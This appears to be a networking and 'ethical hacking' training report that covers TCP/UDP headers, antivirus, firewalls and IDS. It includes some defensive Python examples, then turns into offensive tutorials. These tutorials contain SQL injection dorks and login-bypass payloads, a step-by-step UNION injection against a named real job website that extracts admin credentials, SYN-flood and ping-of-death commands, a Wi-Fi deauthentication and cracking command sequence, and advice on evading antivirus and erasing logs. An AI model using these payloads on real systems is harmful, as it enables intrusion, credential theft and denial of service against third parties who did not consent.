TCP stands for Transmission Control Protocol. It is a transport layer protocol that facilitates the transmission of packets from source to destination. It is a connection-oriented protocol, meaning it establishes the connection prior to the communication between the computing devices in a network. This protocol is used with the IP protocol, so together they are referred to as TCP/IP.
Need for Transmission Control Protocol
In the layered architecture of a network model, the whole task is divided into smaller tasks, and each task is assigned to a particular layer that processes it. In the TCP/IP model, the five layers are the application layer, transport layer, network layer, data link layer and physical layer. The transport layer has a critical role in providing end-to-end communication directly to the application processes. It creates 65,000 ports so that multiple applications can be accessed at the same time. It takes data from the upper layer, divides it into smaller packets and then transmits them to the network layer.
Working of TCP
In TCP, the connection is established using a three-way handshake. The client sends a segment with its sequence number. The server, in return, sends its own segment with its own sequence number and an acknowledgment number that is one more than the client's sequence number. When the client receives the acknowledgment of its segment, it sends an acknowledgment back to the server. In this way, the connection is established between the client and the server.
TCP Header format
o Source port: It defines the port of the application, which is sending the data. So, this field
contains the source port address, which is 16 bits.
o Destination port: It defines the port of the application on the receiving side. So, this field
contains the destination port address, which is 16 bits.
o Sequence number: This field contains the sequence number of data bytes in a particular
session.
o Acknowledgment number: When the ACK flag is set, then this contains the next sequence
number of the data byte and works as an acknowledgment for the previous data received.
For example, if the receiver receives the segment number 'x', then it responds 'x+1' as an
acknowledgment number.
o HLEN: It specifies the length of the header in 4-byte words. The size of the header lies between 20 and 60 bytes, so the value of this field lies between 5 and 15.
o Reserved: It is a 4-bit field reserved for future use, and by default, all are set to zero.
o Flags
There are six control bits or flags:
1. URG: It represents an urgent pointer. If it is set, then the data is processed urgently.
2. ACK: If the ACK is set to 0, then it means that the data packet does not contain an
acknowledgment.
3. PSH: If this field is set, then it requests the receiving device to push the data to the receiving
application without buffering it.
4. RST: If it is set, then it requests to restart a connection.
5. SYN: It is used to establish a connection between the hosts.
6. FIN: It is used to release a connection, and no further data exchange will happen.
o Window size
It is a 16-bit field. It contains the size of data that the receiver can accept. This field is used
for the flow control between the sender and receiver and also determines the amount of
buffer allocated by the receiver for a segment. The value of this field is determined by the
receiver.
o Checksum
It is a 16-bit field. This field is optional in UDP, but in TCP it is mandatory.
o Urgent pointer
It is a pointer that points to the urgent data byte if the URG flag is set to 1. It defines a value
that will be added to the sequence number to get the sequence number of the last urgent
byte.
o Options
It provides additional options. The options field is represented in 32-bit words. If the options occupy less than a full 32-bit word, padding is added to fill the remaining bits.
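As an added example (not code from the report), a Python serializer and parser for the header fields listed above, plus a check of the three-way handshake rule from the "Working of TCP" section (each acknowledgment number is the peer's sequence number plus one). The checksum is left at zero because computing it needs the IP pseudo header; the ports, sequence numbers and the MSS option bytes are constructed.

```python
import struct

TCP_FLAGS = ("URG", "ACK", "PSH", "RST", "SYN", "FIN")   # bit 5 down to bit 0


def build_tcp_header(src_port, dst_port, seq, ack, flags, window=65535, options=b""):
    """Serialize a TCP header; `flags` is a set of names from TCP_FLAGS."""
    if len(options) % 4:                                  # options are padded to 32-bit words
        options += b"\x00" * (4 - len(options) % 4)
    hlen = 5 + len(options) // 4                          # header length in 4-byte words
    if not 5 <= hlen <= 15:
        raise ValueError("HLEN must be between 5 and 15")
    flag_bits = 0
    for i, name in enumerate(TCP_FLAGS):
        if name in flags:
            flag_bits |= 1 << (5 - i)
    offset_flags = (hlen << 12) | flag_bits               # HLEN, reserved bits (zero), 6 flags
    fixed = struct.pack("!HHIIHHHH", src_port, dst_port, seq & 0xFFFFFFFF,
                        ack & 0xFFFFFFFF, offset_flags, window, 0, 0)
    return fixed + options


def parse_tcp_header(data):
    """Decode the header; ack and urgent pointer are None when their flag is clear."""
    if len(data) < 20:
        raise ValueError("truncated TCP header")
    (src, dst, seq, ack, offset_flags,
     window, checksum, urg) = struct.unpack("!HHIIHHHH", data[:20])
    hlen = offset_flags >> 12
    if not 5 <= hlen <= 15 or hlen * 4 > len(data):
        raise ValueError("bad HLEN %d" % hlen)
    flag_bits = offset_flags & 0x3F
    flags = {name for i, name in enumerate(TCP_FLAGS) if flag_bits & (1 << (5 - i))}
    return {
        "src_port": src, "dst_port": dst, "seq": seq,
        "ack": ack if "ACK" in flags else None,
        "hlen": hlen, "flags": flags, "window": window, "checksum": checksum,
        "urgent_pointer": urg if "URG" in flags else None,
        "options": data[20:hlen * 4], "payload": data[hlen * 4:],
    }


def handshake_is_valid(syn, synack, ack):
    """Three-way handshake rule: each side acknowledges the peer's sequence number + 1."""
    s, sa, a = parse_tcp_header(syn), parse_tcp_header(synack), parse_tcp_header(ack)

    def nxt(n):
        return (n + 1) & 0xFFFFFFFF

    return (s["flags"] == {"SYN"}
            and sa["flags"] == {"SYN", "ACK"} and sa["ack"] == nxt(s["seq"])
            and a["flags"] == {"ACK"} and a["ack"] == nxt(sa["seq"])
            and a["seq"] == nxt(s["seq"]))


if __name__ == "__main__":
    # Constructed handshake: client port 40000 -> server port 80, initial seqs 1000 / 5000.
    syn = build_tcp_header(40000, 80, 1000, 0, {"SYN"}, options=b"\x02\x04\x05\xb4")
    synack = build_tcp_header(80, 40000, 5000, 1001, {"SYN", "ACK"})
    ack = build_tcp_header(40000, 80, 1001, 5001, {"ACK"})
    print(parse_tcp_header(syn))
    print("handshake valid:", handshake_is_valid(syn, synack, ack))
```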
User datagram Protocol
User Datagram Protocol (UDP) is a transport layer protocol. UDP is a part of the Internet Protocol suite, referred to as the UDP/IP suite. Unlike TCP, it is an unreliable and connectionless protocol, so there is no need to establish a connection prior to data transfer.
Although Transmission Control Protocol (TCP) is the dominant transport layer protocol used with most Internet services and provides assured delivery, reliability and much more, all these services cost us additional overhead and latency. Here UDP comes into the picture. For real-time services like computer gaming, voice or video communication and live conferences, we need UDP. Since high performance is needed, UDP permits packets to be dropped instead of processing delayed packets. There is no error checking in UDP, so it also saves bandwidth.
User Datagram Protocol (UDP) is more efficient in terms of both latency and bandwidth.
UDP Header
The UDP header is a fixed, simple 8-byte header, while the TCP header may vary from 20 bytes to 60 bytes. The first 8 bytes contain all necessary header information and the remaining part consists of data. UDP port number fields are each 16 bits long, so the range for port numbers is 0 to 65535; port number 0 is reserved.
Port numbers help to distinguish different user requests or processes.
1. Source Port: a 2-byte field used to identify the port number of the source.
2. Destination Port: a 2-byte field used to identify the port of the destined packet.
3. Length: the length of the UDP datagram including header and data. It is a 16-bit field.
4. Checksum: a 2-byte field. It is the 16-bit one's complement of the one's complement sum of the UDP header, a pseudo header of information from the IP header and the data, padded with zero octets at the end (if necessary) to make a multiple of two octets.
Technology aspect for IT security & ethical hacking
Story:
"In a real war a soldier must understand all weapons and their timing and effect on each target, to win the war in minimum time."
In the same way, in IT security and ethical hacking we need to break Antivirus, Firewall, IDS and IPS for penetration testing or ethical hacking.
1. Antivirus
Effective antivirus software guards your computer from all forms of malware, including traditional
computer viruses, worms, Trojan horses and even sophisticated, blended attacks. Not only does
antivirus software detect and eliminate any viruses or malware that may have already infected
your hard drive, many solutions that offer a free virus scan actively prevent new infections before
they have a chance to affect your computer. Antivirus software will scan and analyze emails and
files for infection as they are downloaded.
Using the method of signature-based detection, antivirus software checks a file's contents
against a dictionary of known virus signatures - a pattern of code that uniquely identifies a virus.
If a virus signature is found, the antivirus software will remove the threat.
Antivirus software obviously detects potential threats in a few different ways. But what about the
latest and greatest viruses? Because people create new viruses every day, an antivirus program
will constantly update its dictionary of virus signatures. Many antivirus software programs --
including those that offer free virus protection -- also employ heuristic analysis, which can identify
variants of known malware - viruses that have been mutated or refined by attackers to create
different strains.
How does antivirus work?
Before understanding how antivirus works, we first need to understand how a program works in a computer OS.
Each program is a set of coded instructions for processing inputs and outputs. The final form of the code is zeros and ones (binary language).
Antivirus companies build a team and a list of known RAT and virus builders, create executable files with them, and find the part of each executable that is always the same for a given builder. From this the antivirus company builds a signature database, which the antivirus engine uses to block known viruses.
For unknown viruses, antivirus software uses behaviour patterns: it checks behaviour such as file modification date, installation location, visibility type, etc., and blocks programs according to a rating system; Norton SONAR is a good example.
How to bypass antivirus?
To bypass antivirus, we need to build a new RAT or virus using our own code, or else modify existing code using crypters, binders, packers, etc.
2. Firewall
A firewall is the second layer of IT security; it blocks unauthorized or unwanted communications between computer networks or hosts.
A firewall is a set of related programs, located at a network gateway server that protects the
resources of a private network from users from other networks. (The term also implies the
security policy that is used with the programs.) An enterprise with an intranet that allows its
workers access to the wider Internet installs a firewall to prevent outsiders from accessing
its own private data resources and for controlling what outside resources its own users have
access to.
Basically, a firewall, working closely with a router program, examines each network packet
to determine whether to forward it toward its destination. A firewall also includes or works
with a proxy server that makes network requests on behalf of workstation users. A firewall is
often installed in a specially designated computer separate from the rest of the network so
that no incoming request can get directly at private network resources.
There are a number of firewall screening methods. A simple one is to screen requests to
make sure they come from acceptable (previously identified) domain name and Internet
Protocol addresses. For mobile users, firewalls allow remote access in to the private
network by the use of secure logon procedures and authentication certificates.
A number of companies make firewall products. Features include logging and reporting,
automatic alarms at given thresholds of attack, and a graphical user interface for controlling
the firewall.
Computer security borrows this term from firefighting, where it originated. In firefighting, a
firewall is a barrier established to prevent the spread of fire.
What does a firewall do?
A firewall filters both inbound and outbound traffic. It can also manage public access to private networked resources such as host applications. It can be used to log all attempts to enter the private network and to trigger alarms when hostile or unauthorized entry is attempted.
A firewall can filter packets based on their source and destination addresses and port numbers. This is known as address filtering. A firewall can also filter specific types of network traffic. This is known as protocol filtering because the decision to forward or reject traffic depends upon the protocol used, for example HTTP, FTP or telnet. Firewalls can also filter traffic by packet attribute or state.
3. IDS (Intrusion Detection System)
An intrusion detection system (IDS) monitors network traffic for suspicious activity and alerts the system or network administrator. In some cases, the IDS may also respond to anomalous or malicious traffic by taking action such as blocking the user or source IP address from accessing the network.
IDS come in a variety of “flavors” and approach the goal of detecting suspicious traffic in different
ways. There is network based (NIDS) and host based (HIDS) intrusion detection systems. There
are IDS that detect based on looking for specific signatures of known threats- similar to the way
antivirus software typically detects and protects against malware- and there are IDS that detect
based on comparing traffic patterns against a baseline and looking for anomalies. There are IDS
that simply monitor and alert and there are IDS that perform an action or actions in response to
a detected threat. We’ll cover each of these briefly.
There are three main types of IDS:
1. NIDS (Network Intrusion Detection System)
Network Intrusion Detection Systems are placed at a strategic point or points within the network
to monitor traffic to and from all devices on the network. Ideally you would scan all inbound and
outbound traffic; however, doing so might create a bottleneck that would impair the overall speed
of the network.
2. HIDS (Host-based Intrusion Detection System)
Host Intrusion Detection Systems run on individual hosts or devices on the network. A HIDS monitors the inbound and outbound packets from the device only and will alert the user or administrator if suspicious activity is detected.
3. SIDS (Stack-based Intrusion Detection System)
A signature-based IDS will monitor packets on the network and compare them against a
database of signatures or attributes from known malicious threats. This is similar to the way most
antivirus software detects malware. The issue is that there will be a lag between a new threat
being discovered in the wild and the signature for detecting that threat being applied to your IDS.
During that lag time your IDS would be unable to detect the new threat.
4. Anomaly Based
An IDS which is anomaly based will monitor network traffic and compare it against an established
baseline. The baseline will identify what is “normal” for that network- what sort of bandwidth is
generally used, what protocols are used, what ports and devices generally connect to each
other- and alert the administrator or user when traffic is detected which is anomalous, or
significantly different, than the baseline.
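As an added example (not from the report), the two detection approaches above side by side in Python: signature matching of payloads against a dictionary of known patterns (the same idea as the antivirus signature database described earlier, applied to traffic) and an anomaly detector that learns which services and traffic volumes are normal from baseline flows and flags unknown services or unusually large flows. The signatures, baseline and test flows are all constructed.

```python
import re
import statistics
from collections import defaultdict

# Constructed signature dictionary: name -> pattern over the payload bytes.
SIGNATURES = {
    "sqli-tautology": re.compile(rb"'\s*or\s*'?\w+'?\s*=\s*'?\w+", re.I),
    "dir-traversal": re.compile(rb"\.\./\.\./"),
    "telnet-root": re.compile(rb"^login:\s*root\b", re.I | re.M),
}


def signature_matches(payload):
    """Names of every known signature found in the payload (empty list = nothing known)."""
    return [name for name, pattern in SIGNATURES.items() if pattern.search(payload)]


class AnomalyDetector:
    """Learns a baseline (services in use, typical bytes per flow) and flags deviations."""

    def __init__(self, k=3.0):
        self.k = k                          # standard deviations above the mean that count as anomalous
        self.samples = defaultdict(list)    # (proto, dport) -> bytes per flow seen in training
        self.baseline = {}                  # (proto, dport) -> (mean, stdev)

    def train(self, flows):
        for f in flows:
            self.samples[(f["proto"], f["dport"])].append(f["bytes"])
        for service, values in self.samples.items():
            stdev = statistics.pstdev(values) if len(values) > 1 else 0.0
            self.baseline[service] = (statistics.fmean(values), stdev)

    def check(self, flow):
        """Return a reason string when the flow deviates from the baseline, else None."""
        service = (flow["proto"], flow["dport"])
        if service not in self.baseline:
            return "service %s/%d never seen in baseline" % service
        mean, stdev = self.baseline[service]
        limit = mean + self.k * max(stdev, 1.0)   # floor: a zero-variance baseline must not flag everything
        if flow["bytes"] > limit:
            return "%d bytes exceeds baseline limit %.0f" % (flow["bytes"], limit)
        return None


def run_ids(detector, flows):
    """Run both detectors over flow records; returns (src, kind, detail) alerts."""
    alerts = []
    for f in flows:
        for name in signature_matches(f.get("payload", b"")):
            alerts.append((f["src"], "signature", name))
        reason = detector.check(f)
        if reason:
            alerts.append((f["src"], "anomaly", reason))
    return alerts


# Constructed baseline traffic for a small network: only web, TLS and DNS.
BASELINE = (
    [{"src": "10.0.0.%d" % i, "proto": "tcp", "dport": 80, "bytes": b}
     for i, b in enumerate((1800, 2100, 1950, 2300, 1700, 2050), start=2)]
    + [{"src": "10.0.0.2", "proto": "tcp", "dport": 443, "bytes": 4000},
       {"src": "10.0.0.3", "proto": "tcp", "dport": 443, "bytes": 4500}]
    + [{"src": "10.0.0.%d" % i, "proto": "udp", "dport": 53, "bytes": b}
       for i, b in enumerate((90, 110, 100), start=2)]
)


def build_detector():
    detector = AnomalyDetector()
    detector.train(BASELINE)
    return detector


if __name__ == "__main__":
    live = [   # constructed flows to inspect
        {"src": "10.0.0.4", "proto": "tcp", "dport": 80, "bytes": 2400, "payload": b"GET /index.html HTTP/1.1"},
        {"src": "203.0.113.9", "proto": "tcp", "dport": 80, "bytes": 2000,
         "payload": b"POST /Admin_Login.asp user=Admin&pass=password' or 1=1--"},
        {"src": "203.0.113.9", "proto": "tcp", "dport": 23, "bytes": 300, "payload": b""},
        {"src": "10.0.0.7", "proto": "udp", "dport": 53, "bytes": 9000, "payload": b""},
    ]
    for alert in run_ids(build_detector(), live):
        print(alert)
```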
5. IPS (Intrusion prevention system)
Intrusion prevention is a preemptive approach to network security used to identify potential
threats and respond to them swiftly. Like an intrusion detection system (IDS), an intrusion
prevention system (IPS) monitors network traffic. However, because an exploit may be
carried out very quickly after the attacker gains access, intrusion prevention systems also
have the ability to take immediate action, based on a set of rules established by the network
administrator. For example, an IPS might drop a packet that it determines to be malicious
and block all further traffic from that IP address or port. Legitimate traffic, meanwhile, should
be forwarded to the recipient with no apparent disruption or delay of service.
According to Michael Reed of Top Layer Networks, an effective intrusion prevention system
should also perform more complex monitoring and analysis, such as watching and
responding to traffic patterns as well as individual packets. "Detection mechanisms can
include address matching, HTTP string and substring matching, generic pattern matching,
TCP connection analysis, packet anomaly detection, traffic anomaly detection and TCP/UDP
port matching."
Broadly speaking, an intrusion prevention system can be said to include any product or
practice used to keep attackers from gaining access to your network, such as firewalls and
anti-virus software.
Steps of Hacking
1. Information gathering
This is the first step of hacking and penetration testing; first we collect all information about the target with the help of tools and manual methods. Without much information, our attack success rate is low.
Manual Process:
1. Get URL using Google search.
2. Using whois sites.
5. www.who.is
6. www.robtex.com
7. www.domaintools.com
3. Get PDF and Document using Google special features:
8. Site:4share.com CISSP
9. Site:pastebin.com inurl:hack
10. Chemistry filetype:doc
11. http://www.googleguide.com/advanced_operators_reference.html
Automated Process:
1. We use following tools for information gathering:
UberHarvest
theharvester.py
Metagoofil
Web Data Extractors (Email-Phone no Extractors)
Maltego
2. People Search:
pipl.com
anywho.com
address.com
Social networking sites (Facebook, LinkedIn, twitter)
Job Sites [ dice.com, monster.com, naukri.com]
3. Phone Number
truecaller.com
kgdetective.com
phunwa.com
4. Trace route Tools
Vtrace [ www.vtrace.pl ]
Trout [ www.foundstone.com ]
tracert , traceroute [ commands ]
5. Email IP Tracking
wspy.org
Emailtrackerpro.com
Readnotify.com
Politemail.com
2. Scanning & Banner Grabbing
After getting information about the target, we need to know the OS type and the versions of the applications running on open ports, etc., for successful exploitation.
We need to use the following tools:
1. Port & network scanning:
Port and network scanning is used to find open ports and active PCs in the network.
Nmap
Angry IP scanner
Hping
2. Banner Grabbing:
Banner grabbing is the process of finding the exact version of the target application, in order to search for loopholes, exploits or zero-days.
Telnet
ID serve
3. Vulnerability Scanning
This step is used to find out loopholes in applications using tools; afterwards we use public and private exploits to enter the target system remotely.
Vulnerability scanner:
Acunetix
Netsparke
Nessus
gfi languard
Whatweb [ Find out web application ][ Backtrack Tool ]
E.g.: ./whatweb bytec0de.com
zoomscan [ scan zoomla website ] [ /pentest/web/zoomscan ]
E.g.: ./joomscan.pl -u http://liclanka.com/
Nikto:
E.g. ./nikto.pl -host liclanka.com
Websecurifi
Vega
w3af
webshag
After finding a vulnerability we look for an exploit; we need to compile it using its associated language and change the shellcode if required for a connect-back.
4. Exploitation (Obtaining access)
Program exploitation is a staple of hacking. A program is made up of a complex set of rules
following a certain execution flow that ultimately tells the computer what to do. Exploiting a
program is simply a clever way of getting the computer to do what you want it to do, even if
the currently running program was designed to prevent that action. Since a program can
really only do what it’s designed to do, the security holes are actually flaws or oversights in
the design of the program or the environment the program is running in. It takes a creative
mind to find these holes and to write programs that compensate for them. Sometimes these
holes are the products of relatively obvious programmer errors, but there are some less
obvious errors that have given birth to more complex exploit techniques that can be applied
in many different places.
5. Maintaining access & erasing evidence
This is the post-exploitation phase, to maintain future access on the target system. We need to deploy malware as per our requirement, or else erase logs and evidence, or use an offshore VPS for the whole operation.
Dos & DDos Attacks
1. Dos Attack:
A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. Examples include:
o attempts to "flood" a network, thereby preventing legitimate network traffic
o attempts to disrupt connections between two machines, thereby preventing access to a service
o attempts to prevent a particular individual from accessing a service
o attempts to disrupt service to a specific system or person
It is an attempt to make a machine or network resource unavailable to its intended users by consuming all the resources available to a person, like network bandwidth, all types of memory, etc.
1. Ping of Death
ping -t -l 6550 google.com [ max buffer size = 65500 ]
Effective system [ Solaris 2.4 , minix , win3.11,95 ]
2. SYN-ATTACK
Hping -i sudo hping3 -i u1 -S -p 80 192.168.1.1
3. UDP/HTTP/TCP Flooding
LOIC
HOIC
4. Smurf Attack
make your own packet and flood on network
pktbuilder
packETH 1.6 (linux & windows)
5. CDP Flooding (Cisco Discovery Protocol)
yersinia [ backtrack ]
Done on Cisco Switches & Routers
6. MAC Flooding
Flooding network switches
ARP Spoofing
Net cut [ Windows ]
ettercap [ Backtrack ]
Deauthentication Technique
2. Ddos Attack
DDOS, short for Distributed Denial of Service, is a type of DOS attack where multiple
compromised systems -- which are usually infected with a Trojan – are used to target a single
system causing a Denial of Service (DoS) attack. Victims of a DDoS attack consist of both the
end targeted system and all systems maliciously used and controlled by the hacker in the
distributed attack.
According to this report on e-Security Planet, in a DDoS attack, the incoming traffic flooding the
victim originates from many different sources – potentially hundreds of thousands or more. This
effectively makes it impossible to stop the attack simply by blocking a single IP address; plus, it
is very difficult to distinguish legitimate user traffic from attack traffic when spread across so
many points of origin.
Figure: Distribution of attack techniques, January 2013
Figure: DDoS attacks in Q1 2019 (Securelist)
Wireless hacking
Wireless networks broadcast their packets using radio frequency or optical wavelengths. A
modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the
fly and persuade wireless stations to accept his packets as legitimate.
The step by step procedure in wireless hacking can be explained with help of different topics as
follows:-
i. Stations and Access Points: - A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station. An access point (AP) is a station that provides frame distribution service to stations associated with it. The AP itself is typically connected by wire to a LAN. Each AP has a 0-to-32-byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.
ii. Channels: - The stations communicate with each other using radiofrequencies between
2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless
networks using neighboring channels may interfere with each other.
iii. Wired Equivalent Privacy (WEP): - It is a shared-secret key encryption system used to
encrypt packets transmitted between a station and an AP. The WEP algorithm is
intended to protect wireless communication from eavesdropping. A secondary function
of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the
payload of data packets. Management and control frames are always transmitted in the
clear. WEP uses the RC4 encryption algorithm.
iv. Wireless Network Sniffing: - Sniffing is eavesdropping on the network. A (packet)
sniffer is a program that intercepts and decodes network traffic broadcast through a
medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help
find the easy kill as in scanning for open access points that allow anyone to connect, or
capturing the passwords used in a connection session that does not even use WEP, or
in telnet, rlogin and ftp connections.
Steps for hacking Wi-Fi:
airmon-ng start wlan0
airodump-ng mon0
airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w bytecodelab mon0
aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0
aircrack-ng bytecodelab.cap
SQL Injection
1. What is Sql injection attack?
A SQL Injection attack is a form of attack that comes from user input that has not been
checked to see that it is valid. The objective is to fool the database system into running
malicious code that will reveal sensitive information or otherwise compromise the server.
SQL injection is a technique used to take advantage of non-validated input vulnerabilities
to pass SQL commands through a Web application for execution by a backend database.
Attackers take advantage of the fact that programmers often chain together SQL
commands with user-provided parameters, and can therefore embed SQL commands
inside these parameters. The result is that the attacker can execute arbitrary SQL queries
and/or commands on the backend database server through the Web application.
1. MYSQL Injection
Dorks Code
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administrator_login.asp
I am going to use:
Code:
http://site.com/Admin_Login.asp
Logging
Now you can find some site over these dorks and try to log in with
Username: Admin
Password: password' or 1=1—
Instead of password' or 1=1 you can use some of these:
Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 –
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'
Password' or 1=1 will confuse the server and will let you log in.
So if you are able to log in, the site is vulnerable and you are going to be able to use the admin panel.
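As an added example (not from the report), a minimal login check in Python with sqlite3 that shows why the payload above works and what stops it: the first version builds the query by string concatenation, so `password' or 1=1--` turns the WHERE clause into a tautology and comments out the rest; the second passes the same input as a bound parameter, so the database never parses it as SQL. The table and credentials are constructed.

```python
import sqlite3


def make_db():
    """Constructed admin table with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('Admin', 'S3cret-constructed')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Query text is assembled from user input, so the input is parsed as SQL."""
    sql = ("SELECT username FROM admin WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Placeholders keep the input as data; quotes and '--' in it have no SQL meaning."""
    sql = "SELECT username FROM admin WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    for user, pw in (("Admin", "S3cret-constructed"), ("Admin", "password' or 1=1--")):
        print(repr(pw), "vulnerable:", login_vulnerable(conn, user, pw),
              "parameterized:", login_parameterized(conn, user, pw))
```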
2. Advance SQL Injection
Eg. Of advance SQL injection:
Target: http://www.naukriguru.com
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 100
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 10
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 20
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 50
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 40
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 30
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 35
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 33
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 32
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 order by 31
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,
29,30,31—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2
8,29,30,31—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2
4,25,26,27,28,29,30,31—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2
4,25,26,27,28,29,30,31—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2
4,25,26,27,28,29,30,31 from information_schema.tables where table_schema
=database()—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2
3,24,25,26,27,28,29,30,31 from information_schema.columns where table_name
=0x6e675f61646d696e—
http://www.naukriguru.com/jobseeker/job-display-walk- in.php?id=-98 union select
1,2,group_concat(id,0x3a,loginid,0x3a,email,0x3a,password,0x3a,name,0x3a,type,0x3),
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
fromng_admin—
http://www.naukriguru.com/admin/
http://www.naukriguru.com/admin/index.php#
http://www.naukriguru.com/admin/add_industry.php
Tools used for SQL injection are:
o Havij v1.15
o Sql map
o Bsql hacker
o Pangolin
o Absinthe
MALWARE
This is a big catchall phrase that covers all sorts of software with nasty intent. Not buggy
software, not programs you don’t like, but software which is specifically written with the intent to
harm.
Virus:
This is a specific type of malware that spreads itself once it’s initially run. It’s different from
other types of malware because it can either be like a parasite that attaches to good files on
your machine, or it can be self-contained and search out other machines to infect.
Worm:
Think of inchworms rather than tapeworms. These are not parasitic worms, but the kind that
move around on their own. In the malware sense, they’re viruses that are self-contained (they
don’t attach themselves like a parasite) and go around searching out other machines to infect.
Trojan:
Do you remember that story you had to read in high school about the big wooden horse that
turned out to be full of guys with spears? This is the computer equivalent. You run a file that
is supposed to be something fun or important, but it turns out that it’s neither fun nor
important, and it’s now doing nasty things to your machine.
Penetration Testing
Introduction:
1. What is penetration testing?
Penetration testing is a method of evaluating the security of a computer system or a network by simulating an attack from a malicious source, known as a black hat hacker or cracker. The process involves an active analysis of the system for any potential vulnerabilities that may result from poor or improper system configuration, known and/or unknown hardware or software flaws, or operational weaknesses in process or technical countermeasures.
2. Why conduct a penetration test?
From a business perspective, penetration testing helps safeguard your organization against
failure, through:
Preventing financial loss through fraud or through lost revenue due to unreliable
business system and processes.
Proving due diligence and compliance to your industry regulators, customers and
shareholders.
Protecting your brand by avoiding loss of consumer confidence and business
reputation.
3. What can be tested?
Every part where the organization captures, stores and processes information can be assessed: the systems where the information is stored, the transmission channels that transport it, and the processes and personnel that manage it. Examples of areas that are commonly tested are:
Operating system, applications, database, networking equipment’s etc.
Dynamic websites, in-house applications etc.
Telephony (war-dialing, remote access etc.)
Personnel (screening process, social engineering etc.)
Physical (access controls, dumpster diving etc.)
Wireless (Wi-Fi, Bluetooth, IR, GSM, RFID etc.)
4. What is the process of penetration testing?
Penetration testing also has a vulnerability assessment part. In a pen test we launch attacks, while in VA (vulnerability assessment) we only test for vulnerabilities using automated VA tools like Nikto, Nessus, Acunetix, etc.
Steps of advanced penetration testing:
If we want to pen test any website, like www.anysite.com, we need DNS records from robtex.com, whois records and other types of information; this part is known as Information Gathering.
Afterwards we use the BackTrack operating system (also known as the pen-testing OS for security experts) toolkit for automated pen-testing with the help of free tools like Nikto, Privoxy, Nessus, Samurai, etc.
Make a report of all found vulnerabilities and cross-verify.
Use commercial software like Core Impact, Canvas, QualysGuard, Xcobra, NTOSpider, KSES, AppScan, WebInspect, Burp Suite, Acunetix WVS, etc.
Make a report of new vulnerabilities.
Afterwards we start manual pen-testing with the help of Metasploit and reverse engineering tools.
Find vulnerabilities, take screenshots for Proof-of-Concept and create a custom report.
Forward the custom report to the company.
METASPLOIT
1. What is Metasploit?
The Metasploit project is an open-source computer security project which provides information
about security vulnerabilities and aids in penetration testing and IDS signature development. Its
most well-known sub-project is the Metasploit Framework, a tool for developing and executing
exploit code against a remote target machine. Other important sub-projects include the Opcode
Database, the shellcode archive, and security research. Metasploit is a top hacking framework for
doing local and remote hacking in an easy way.
Metasploit Terms:
